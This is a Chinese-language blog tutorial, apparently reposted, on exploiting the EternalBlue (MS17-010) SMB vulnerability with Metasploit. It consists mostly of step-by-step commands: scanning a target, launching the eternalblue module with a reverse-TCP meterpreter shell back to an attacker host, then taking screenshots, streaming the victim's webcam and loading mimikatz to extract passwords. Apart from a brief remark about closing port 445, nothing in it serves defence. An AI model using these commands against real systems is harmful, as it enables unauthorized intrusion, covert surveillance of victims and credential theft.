永恒之蓝漏洞(EternalBlue)
? ? ? ?今天就跟大家分享下剛剛學習到利用MSF框架快速搞定“MS017-010”漏洞。其實我們這里所說的使用MSF 實現 “永恒之藍”的快速攻擊,就是利用Metasploit中針對ms17-101漏洞的攻擊載荷進行攻擊獲取主機控制權限。“永恒之藍”的原理主要是掃描所有開放445文件共享端口的Windows機器。
445端口簡介:
? ? ? ?445端口是一個毀譽參半的端口,有了它我們可以在局域網中輕松訪問各種共享文件夾或共享打印機,但也正是因為有了它,黑客們才有了可乘之機,他們能通過該端口偷偷共享你的硬盤,甚至會在悄無聲息中將你的硬盤格式化掉! 2017年10月,由于病毒"壞兔子"來襲,國家互聯網應急中心等安全機構建議用戶及時關閉計算機以及網絡設備上的445和139端口 。
準備:
實戰攻擊:
Step1:查看MSF框架版本
在終端輸入msfconsole
Step2: 安裝更新metasploit
終端輸入apt-get? install metasploit-framework
Step3:漏洞模塊路經查詢
在終端輸入:search ms17-010
Step4:加載掃描模塊
use auxiliary/scanner/smb/smb_ms17_010
show options
set rhosts 192.168.0.130? ? ? ?(靶機的IP)
exploit
?
Step5:加載攻擊模塊并配置參數
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/reverse_tcp
show options
set rhost 192.168.0.130?(靶機的IP)
set lhost 192.168.0.129?(發起攻擊的主機IP)
set lport 443? ? ? ?(監聽的端口)
?
Step6:發起攻擊,成功會反彈shell
輸入run或者exploit
?
Meterpreter功能展現
1.捕捉桌面:
meterpreter >screenshot
2.視屏開啟
meterpreter > webcam_stream
kali會自動打開瀏覽器播放被攻擊電腦的攝像頭,被攻擊者的攝像頭也會亮起來
?
3.獲取系統管理密碼
Step1:載入mimikatz
meterpreter > load mimikatz
Step2:使用命令wdigest獲取密碼
Meterpreter功能有很多,這里就不一一的示范了,有興趣的可以自己去測試下。
總結
以上是生活随笔為你收集整理的永恒之蓝漏洞(EternalBlue)的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 图像对齐深度学习算法调研
- 下一篇: 简单的卷积神经网络编程,卷积神经网络算法